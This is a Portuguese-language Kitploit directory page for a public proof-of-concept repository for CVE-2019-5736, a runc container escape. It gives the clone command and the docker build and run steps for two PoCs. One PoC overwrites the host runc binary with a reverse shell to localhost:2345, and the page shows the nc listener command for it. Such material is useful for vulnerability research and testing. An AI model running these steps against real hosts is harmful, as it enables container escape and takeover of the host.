Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
RunC-CVE-2019-5736 — PoCs do CVE-2019-5736 | Kitploit
Ferramentas/GitHubGitHub/twistlock/runc-cve-2019-5736
Segurança de ContêineresAnálise de VulnerabilidadesExploraçãoRed TeamingDesenvolvimento de PayloadsEscape de Contêiner
GitHubtwistlock/runc-cve-2019-5736

RunC-CVE-2019-5736

PoCs do CVE-2019-5736

Ver Repositório
86343há 6 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Site

RunC-CVE-2019-5736

Dois PoCs para CVE-2019-5736. Consulte Twistlock Labs para uma explicação sobre CVE-2019-5736 e os PoCs.

O PoC de imagem maliciosa é fortemente baseado no PoC do q3k, portanto, todo o crédito vai para ele.

Executando os PoCs

Observe que executar os PoCs sobrescreverá o binário runc no host. É recomendado que você crie uma cópia do seu binário runc (normalmente em /usr/sbin/runc) antes de executar um dos PoCs.

Clone o repositório:

root@kitploit:~
$ git clone https://github.com/twistlock/RunC-CVE-2019-5736

Exec PoC

Sobrescreve o runc com um programa simples que imprime uma string.

Executando o PoC exec:

root@kitploit:~
$ cd RunC-CVE-2019-5736 
$ docker build -t cve-2019-5736:exec_POC ./exec_POC
$ docker run -d --rm --name poc_ctr cve-2019-5736:exec_POC
$ docker exec poc_ctr bash

PoC de imagem maliciosa

Sobrescreve o runc com um simples script bash de reverse shell que se conecta a localhost:2345.

Escute o reverse shell:

root@kitploit:~
$ nc -nvlp 2345

Em um shell diferente, execute o PoC de imagem maliciosa:

root@kitploit:~
$ cd RunC-CVE-2019-5736 
$ docker build -t cve-2019-5736:malicious_image_POC ./malicious_image_POC
$ docker run --rm cve-2019-5736:malicious_image_POC
Baixar ferramenta